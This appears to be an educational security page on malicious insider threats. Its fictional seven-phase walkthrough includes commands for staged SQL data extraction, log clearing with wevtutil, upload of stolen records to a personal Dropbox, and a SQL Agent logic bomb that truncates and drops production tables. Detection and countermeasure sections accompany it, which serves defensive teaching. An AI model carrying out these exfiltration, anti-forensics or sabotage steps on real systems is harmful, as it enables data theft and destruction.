CLASSIFIED
CERT Insider Threat Center / MITRE ATT&CK T1078 - Valid Accounts / TA0010

MALICIOUS INSIDER THREAT Deliberate Betrayal of Trust by Authorized Personnel

Unlike external attackers who must breach perimeter defenses, the malicious insider already holds the keys. They abuse legitimate, trusted access to exfiltrate sensitive data, steal credentials, sabotage systems, or sell access - often for months before detection.

HARDEST THREAT TO DETECT - OPERATES INSIDE ALL DEFENSES
Avg Detection Time
216 days
Average days before a malicious insider is detected - longest of any threat category
Avg Cost Per Incident
$701K
Average cost per malicious insider incident - Ponemon Institute 2023 Cost of Insider Threats Report
Cases Financially Motivated
62%
Of malicious insider cases are driven by financial gain - through data theft, competitor sale, or fraud
Privilege Abuse Rate
89%
Of malicious insiders abused legitimate system privileges rather than exploiting technical vulnerabilities
01

01 / Motivations

62%
Financial Gain
PRIMARY DRIVER
Selling proprietary data, customer records, or source code to competitors. Corporate espionage contracts, dark web data sales, or theft of funds via fraudulent transactions. Often triggered by personal financial distress or greed.
21%
Grievance & Revenge
DISGRUNTLEMENT
Retaliation for perceived unfair treatment: denied promotion, disciplinary action, or termination. Sabotage of systems, deletion of critical data, or exposure of confidential information as revenge. Often escalates rapidly after a triggering event.
12%
Ideology / Espionage
STATE-SPONSORED
Nation-state recruited or ideologically motivated insiders passing classified information to foreign intelligence services. Defense, government, and technology sector employees are primary targets for recruitment by hostile state actors.
5%
Coercion / Compromise
INVOLUNTARY ACTOR
Employee is blackmailed, extorted, or threatened into providing access or stealing data. May have been compromised externally first (gambling debts, personal secrets) and subsequently weaponized by criminal or state actors.
02

02 / Threat Actor Profiles

PROFILE - MIT-001 // ACTIVE
👨‍💼
The Departing Employee
IT SYSTEM ADMIN - 7 YRS TENURE
Accepted competitor job offer 3 weeks prior
Bulk download of proprietary codebase to personal USB
Accessed systems not required for current role
Disabled audit logging on his own workstation
Transferred 40GB to personal Google Drive last week
RISK: IP THEFT - COMPETITOR TRANSFER
PROFILE - MIT-002 // ACTIVE
👩‍💻
The Disgruntled DBA
DATABASE ADMINISTRATOR - FINANCE
Recently passed over for promotion - filed HR complaint
Accessing customer PII tables outside business hours
Ran SELECT * queries on 2.4M customer records
Created undocumented database user accounts
Searched internally for "how to cover tracks database"
RISK: DATA EXFIL - SABOTAGE
PROFILE - MIT-003 // ACTIVE
🕵️
The Recruited Spy
SENIOR ENGINEER - R&D DIVISION
Unexplained foreign travel - 3 trips in 6 months
Contacted via LinkedIn by foreign national (handler)
Accessing classified project files outside his clearance
Encrypted USB drives found on premises
Financial windfall unexplained by known income sources
RISK: IP THEFT - ESPIONAGE
PROFILE - MIT-004 // ACTIVE
🧑‍🏫
The Privileged Abuser
HELPDESK ADMIN - OPERATIONS
Resetting executive passwords without ticket authorization
Sold admin credentials on dark web forum (detected by CTI)
Logging into executive accounts using shared service creds
Forwarding C-suite emails to external address
Purchasing cryptocurrency with work equipment
RISK: CRED SALE - ACCESS BROKER
PROFILE - MIT-005 // ACTIVE
👨‍⚕️
The Healthcare Fraudster
BILLING SPECIALIST - HOSPITAL NETWORK
Accessing patient records unrelated to assigned caseload
Viewed 3,200 patient SSNs over 4 months
Submitting fraudulent insurance claims using real patient IDs
Second job found at competing clinic with same patient data
Emailing patient records to personal Gmail account
RISK: HIPAA BREACH - IDENTITY FRAUD
PROFILE - MIT-006 // ACTIVE
🧑‍💼
The Saboteur
DEVOPS ENGINEER - INFRASTRUCTURE
Termination notice issued - 2 weeks remaining
Creating backdoor admin accounts in production systems
Modified infrastructure-as-code with time-delayed deletion
Revoked SSH keys for other team members
Accessed prod database with DROP TABLE commands staged
RISK: SABOTAGE - LOGIC BOMB
03

03 / Indicators of Compromise (IOC)

Behavioral Indicators
Warning signals that security teams should monitor for - individually subtle, collectively damning.
HIGH
BULK DATA EXFILTRATION
Abnormal volume of data moved to external USB, personal cloud storage, or non-business email. DLP alerts on 100+ files in a single session or >1GB upload to consumer cloud services.
HIGH
AFTER-HOURS ACCESS TO SENSITIVE SYSTEMS
Logins to restricted systems at 2–5 AM that deviate significantly from the user's established baseline. Night-shift access on systems that have no business justification for out-of-hours use.
HIGH
PRIVILEGE ESCALATION WITHOUT TICKET
Admin account creation, permission changes, or access elevation that don't correspond to any open IT service ticket. Self-grants of elevated privileges are a critical red flag.
MED
ACCESSING RESOURCES OUTSIDE ROLE
An HR manager repeatedly accessing R&D source code repositories, or a sales rep querying the payroll database. UEBA baselines normal access patterns and alerts on outliers.
MED
AUDIT LOG TAMPERING
Disabling audit trails, clearing event logs, or modifying timestamps. Technically sophisticated insiders attempt to erase evidence of their activity. The absence of expected logs is itself evidence.
LOW
DISGRUNTLEMENT PRECURSORS
HR events (PIP, termination notice, denied raise), sudden change in attitude, negative social media posts about employer, or unexplained financial changes - correlate HR data with system behavior.
UEBA Anomaly Detection
Simulated behavioral analytics showing normal vs. anomalous file access pattern for a single user over 30 days:
DAILY FILE ACCESS COUNT - USER: j.chen@corp.internal
Day 1Day 7Day 14Day 21Day 28
UEBA ALERT TIMELINE
Day 23 ⚠ File access 4.2× above baseline - alert raised
Day 24 🔴 800 files accessed - DLP rule triggered
Day 25 🔴 External USB write detected - 14GB
Day 26 ⚡ HR notified: 2-week notice submitted yesterday
Day 26 ✓ Account suspended - forensic investigation started

KEY INSIGHT

Without UEBA correlating the HR offboarding event with the file access spike, this activity would have appeared as normal elevated usage. Context is everything in insider threat detection.

04

04 / Attack Flow Diagram

👤 MALICIOUS INSIDER Trusted employee ATTACK VECTORS 🔑 CRED ABUSE Selling / Sharing 💾 DATA THEFT Exfil to USB/Cloud 💣 SABOTAGE Logic bombs / Delete 🧹 COVER TRACKS Clear logs / Encrypt ESCAPE 📤 EXFILTRATION USB / Mail / Cloud Sold / Used / Leaked 🏭 COMPETITOR IP / Trade Secrets 💰 DARK WEB SALE 💥 SABOTAGE Data Destruction ① INSIDER ACTS ② ATTACK VECTOR ③ COVER TRACKS ④ EXFILTRATE ⑤ IMPACT AVG DWELL TIME: 216 DAYS UNDETECTED
05

05 / Step-by-Step Walkthrough

Phase 01 - Triggering Event

GRIEVANCE & MOTIVATION

😤
INSIDER PROFILE
Marcus Chen - Senior DBA, 9 Years

A triggering event crystallizes the insider's intent. Marcus was passed over for promotion, received a Performance Improvement Plan he considers unjust, and has begun a job search. His mindset shifts from loyal employee to adversary - while still holding full database administrator privileges.

  • Denied promotion despite 9 years of service - junior colleague promoted instead
  • PIP issued - Marcus believes it's retaliation, documents grievance with HR
  • Starts interviewing with competitors - reaches out to former colleagues at rival firms
  • Rationalization: "The company owes me - this data is worth more to them than they paid me"
  • Begins mentally cataloguing what access he has and what would be valuable externally
MARCUS'S INTERNAL MONOLOGUE

"I've built half this database infrastructure. I know where every record lives. They gave the promotion to a 3-year junior who couldn't write a JOIN query when I hired him. I have admin rights to everything. They should have thought about that before the PIP."

MISSED HR WARNING SIGNALS
LinkedIn profile updated to "Open to Work" - not flagged
Formal HR complaint filed - not correlated with system access review
Manager reports Marcus "seems withdrawn and resentful" - not escalated
No privilege review triggered by PIP issuance - access unchanged

DETECTION OPPORTUNITY MISSED

Best practice: HR events (PIP, termination notice, failed promotion) should automatically trigger a privileged access review and elevated monitoring - Marcus's DBA rights should have been scoped down immediately.

Phase 02 - Reconnaissance & Access

ABUSING LEGITIMATE ACCESS

🔑
ADVANTAGE
Trusted Admin - No Alerts Raised

Unlike an external attacker, Marcus needs no exploits. His legitimate DBA credentials give him unrestricted access to production databases containing 4.2 million customer records. He uses standard SQL tools that appear entirely normal in logs - the attack is invisible to signature-based security.

  • Uses his own DBA account - no credential theft needed, activity appears fully legitimate
  • Queries customer database schema to identify most valuable tables (PII, payment, credentials)
  • Accesses competitor-relevant R&D project data outside his normal DBA scope
  • Identifies which tables contain salary data - CEO compensation, acquisition financials
  • Notes that audit logging on the customer table is configured to log only DDL, not SELECT queries
SQL Server - Marcus DBA session (11:34 PM)
-- Enumerate highest-value tables 1> SELECT TABLE_NAME, TABLE_ROWS FROM information_schema.TABLES ORDER BY TABLE_ROWS DESC;   customers 4,218,004 rows ← TARGET payment_methods 3,891,220 rows ← TARGET employee_salary 12,840 rows orders 28,440,112 rows   -- Verify audit logging config 1> SELECT * FROM sys.database_audit_specifications SELECT_action_id: NOT LOGGED ← no audit trail [+] SELECT queries on customer table unmonitored
Phase 03 - Data Preparation

STAGING THE DATA

💾
OPERATION
4.2M Records Extracted & Packaged

Marcus extracts the data over several sessions spread across two weeks, limiting per-session volume to avoid DLP thresholds. He uses legitimate database tools for the extraction and compresses the output to reduce file size before staging for exfiltration.

  • Uses BCP (Bulk Copy Program) - a standard SQL Server tool, not a hacking utility
  • Splits extraction across 14 nightly sessions (300K records each) to stay below DLP alert thresholds
  • Exports to encrypted 7-zip archives using a password only he knows
  • Stores staged files in a hidden folder within a legitimate project directory on his workstation
  • Compresses 4.2M records with PII and payment data down to 2.8GB encrypted archive
cmd.exe - data staging (nightly, 1-2 AM)
:: Night 1 of 14 - staged extraction C:> bcp "SELECT TOP 300000 * FROM customers" queryout chunk01.dat -S PROD-SQL01 -T -c Starting copy... 300000 rows copied.   :: Encrypt with strong passphrase C:> 7z a -p"Revenge#2024!" -mhe=on C:UsersmchenAppDataLocalTemp.projarchive.7z chunk01.dat Everything is OK - encrypted   :: Running for 14 nights Total staged: 4,218,004 records | 2.8 GB Contents: name, email, SSN, card_hash, address DLP alert threshold: 500K/session - NOT triggered
Phase 04 - Anti-Forensics

COVERING TRACKS

🧹
OBJECTIVE
Destroy Evidence Before Departure

Before his final week, Marcus systematically attempts to remove forensic evidence of his activity. With DBA rights, he can modify database audit configurations and clear certain system logs - though he underestimates what Windows event logging, SIEM, and network flow captures retain independently.

  • Clears Windows Security event log on his workstation using wevtutil cl Security
  • Modifies SQL Server audit policy to remove trace of his custom extraction sessions
  • Deletes the temporary staging folder - but doesn't account for VSS shadow copies
  • Uses CCleaner to overwrite free space on his workstation - doesn't know SIEM already shipped logs
  • Fails to clear network flow records or the SIEM's centralized log aggregation - critical oversight
PowerShell (Admin) - anti-forensics
# Attempt to clear local Windows logs PS> wevtutil cl Security Cleared successfully PS> wevtutil cl System Cleared successfully   # Delete staged data folder PS> Remove-Item -Recurse -Force "C:...Temp.proj" Deleted   # What Marcus DOESN'T know: SIEM received all Windows events in real-time VSS shadow copies retain .proj folder Network flows logged: 2.8GB upload to dropbox.com SQL Server trace log retained on separate server ✓
Phase 05 - Data Exfiltration

GETTING THE DATA OUT

📤
STATUS
4.2M Records - Leaving the Building

With data staged and logs (he believes) cleared, Marcus executes exfiltration via multiple channels on his penultimate workday. He uses both physical media and cloud storage to create redundancy. He's already in contact with a data broker who has agreed to pay $45,000 for the customer database.

  • Copies 2.8GB encrypted archive to a personal USB drive brought from home
  • Uploads the same archive to his personal Dropbox account via the corporate network
  • Emails himself a second copy using a ProtonMail address created from a coffee shop WiFi
  • A dark web data broker has been contacted via Tor - $45,000 agreed for the full customer dump
  • Marcus has already received a $5,000 "good faith" cryptocurrency deposit
exfiltration - penultimate day
# USB write - corporate workstation C:> xcopy archive.7z E: /Y 1 File(s) copied - 2.8 GB to USB ✓   # Dropbox upload via corporate network # (Firewall allows Dropbox - not blocked) Uploading: archive.7z → dropbox.com/mchen_personal Progress: ████████████████ 100% 2.8 GB   # Dark web transaction (Tor browser, home) Broker confirms: 4.2M FULL records received Payment: 0.92 BTC (~$40,000) - transferred [!] Data now in criminal possession
Phase 06 - Alternative Vector

SABOTAGE - THE LOGIC BOMB

💣
VECTOR
Time-Delayed Destruction

Not all malicious insiders are motivated by profit. In this scenario - or in addition to theft - Marcus plants a logic bomb: code designed to execute destructive actions automatically after his departure, when he can no longer be immediately blamed. This is a common pattern with terminating DevOps and DBA personnel.

  • Creates a SQL Server Agent job scheduled to run 30 days after his last day
  • Job executes: TRUNCATE TABLE on customers, orders, and payment_methods tables
  • Plants a backdoor stored procedure disguised as a maintenance routine for remote re-entry
  • Modifies database backup rotation policy to overwrite old backups - recovery becomes impossible
  • Sets job owner to a service account - removes his name from the scheduled task
SQL Server - logic bomb deployment
-- Create logic bomb as scheduled maintenance job 1> EXEC msdb.dbo.sp_add_job @job_name = 'DB_Maintenance_Weekly_Cleanup', @owner_login_name = 'sa'; -- hide attribution   -- Schedule: 30 days after his last day 1> EXEC msdb.dbo.sp_add_schedule @schedule_name = 'Weekly', @freq_type = 1, @active_start_date = 20241115; -- future date   -- Payload: destroy all production data TRUNCATE TABLE customers; -- 4.2M rows TRUNCATE TABLE payment_methods; -- 3.9M rows DROP TABLE order_history; -- permanent [!] Bomb planted - triggers 30 days post-departure
Phase 07 - Investigation & Aftermath

DISCOVERY & RESPONSE

🔍
TRIGGER
Threat Intel Feed - Data Seen on Dark Web

Six weeks after Marcus's departure, a threat intelligence service alerts the company that a tranche of their customer data is being sold on a dark web forum. The IR team pulls SIEM logs, network flows, and VSS shadow copies - and reconstructs the entire attack despite Marcus's cleanup attempts.

  • Threat intel feed identifies company's customer data for sale on BreachForums - $45K listing
  • SIEM retained all Windows Security events forwarded in real-time - Marcus's log clearing failed
  • Network flow analysis shows 2.8GB upload to Dropbox from Marcus's workstation on his penultimate day
  • VSS shadow copies recovered the deleted staging folder with extraction scripts intact
  • Logic bomb discovered during IR sweep of SQL Server Agent jobs - defused before trigger date
IR team - forensic reconstruction
# SIEM query - Marcus Chen activity $ splunk search "user=mchen EventCode=4663" earliest=-90d 2,847 file access events - CUSTOMERS table 14 bulk export sessions - 1:00-2:30 AM nightly   # Network flow evidence SRC: 10.4.12.88 (mchen-ws) → dropbox.com Bytes: 2,986,444,032 - archive.7z upload Timestamp: 2024-10-14 16:42:31   # VSS shadow copy recovery Recovered: C:Temp.projchunk*.dat (14 files) Recovered: extraction_script.sql - signed mchen   [CRITICAL] Logic bomb found - defused ✓ [BREACH] 4.2M customer records confirmed stolen
STEP 1 OF 7
06

06 / Notable Real-World Cases

2013 - NSA CONTRACTOR
Edward Snowden
NSA / BOOZ ALLEN HAMILTON
NSA contractor used his sysadmin access and a web crawler to exfiltrate 1.5 million classified documents over several months. Exploited coworker credentials to access compartments beyond his clearance. Ideologically motivated - revealed mass surveillance programs to journalists.
Files: 1.5M classified
Motive: Ideology
Tenure: 3 months at NSA
2020 - TESLA / GIGAFACTORY
Egor Kriuchkov
TESLA GIGAFACTORY - EXTERNAL RECRUITER
Russian criminal offered Tesla employee $1M in cash to plant malware on the Nevada Gigafactory network as part of a ransomware operation. The targeted employee reported the approach to Tesla and the FBI - Kriuchkov was arrested. Rare case of employee integrity foiling the plot.
Offer: $1M BTC
Method: Recruitment / Coercion
Outcome: Foiled - employee reported
2022 - CISCO SABOTAGE
Sudhish Kasaba Ramesh
CISCO SYSTEMS - FORMER ENGINEER
Cisco engineer resigned, then five months later used retained AWS credentials (never revoked) to log into Cisco's production environment and deploy code that deleted 456 virtual machines running WebEx Teams. Caused $1.4M in damages, took 2 weeks to restore service for 16,000 customers.
Damage: $1.4M / 16K customers
Access: Credentials never revoked
Sentence: 24 months federal prison
2023 - FINANCIAL SECTOR
JPMorgan Chase - Data Theft
JPMORGANCHASE - WEALTH MANAGEMENT
A wealth management associate exfiltrated customer account data for 9 months, emailing client financial information including account balances, portfolio holdings, and PII to a personal Gmail account. Used legitimate client access portals - no special tools required. Sold information to investment competitors.
Duration: 9 months undetected
Method: Legitimate portals + Gmail
Motive: Financial - competitor sale
07

07 / Defensive Countermeasures

👁️
UEBA - Behavioral Analytics
User and Entity Behavior Analytics establishes individual baselines and alerts on deviations - after-hours access, bulk downloads, unusual query patterns. Context-aware: correlates HR events (PIP, notice) with access anomalies in real time.
🔐
Privileged Access Management (PAM)
All privileged actions require checkout through a PAM vault (CyberArk, BeyondTrust). Sessions recorded, commands logged, credentials rotated automatically. Prevents credential sharing and provides full session replay for forensic investigation.
📤
Data Loss Prevention (DLP)
Block or alert on bulk file transfers to USB, personal cloud storage, and webmail. Content inspection identifies sensitive data (SSNs, card numbers, IP) in outbound transfers. Network DLP monitors encrypted uploads and unusual data volumes at the egress point.
🚪
Immediate Revocation on Departure
All accounts, tokens, VPN certificates, and cloud credentials revoked on the employee's last minute - not days later. Automated offboarding workflow triggered by HRIS. The Cisco Ramesh case was entirely enabled by credentials active 5 months post-resignation.
🔗
HR–Security Integration
Bidirectional data sharing between HR and the SOC. PIPs, denied promotions, termination notices, and formal complaints automatically trigger elevated monitoring and privilege reviews. The security team treats HR events as threat intelligence signals.
🔍
Least Privilege & Need-to-Know
Grant access only to resources required for the current role. Regular access certification reviews remove accumulated permissions. Just-in-time (JIT) access for sensitive operations: elevated privileges granted only for the duration of an approved task, then auto-revoked.
📋
Database Activity Monitoring
Log ALL query types including SELECT - not just DDL. Alert on: bulk SELECT with no WHERE clause, queries outside business hours, queries from unusual IP addresses, and export operations. Marcus's extraction would have been detected on night one with proper DAM coverage.
🛡️
Logic Bomb Prevention
Audit all scheduled tasks, cron jobs, and SQL Agent jobs before and after any employee departure. Require two-person approval for scheduled destructive operations in production environments. Scan for time-delayed code during offboarding of privileged technical staff.
🔒
Immutable Centralized Logging
Forward all security events to a centralized SIEM in real time - separate from systems the insider controls. WORM (Write-Once-Read-Many) log storage that cannot be deleted even by administrators. Marcus's local log clearing had zero impact because the SIEM already had everything.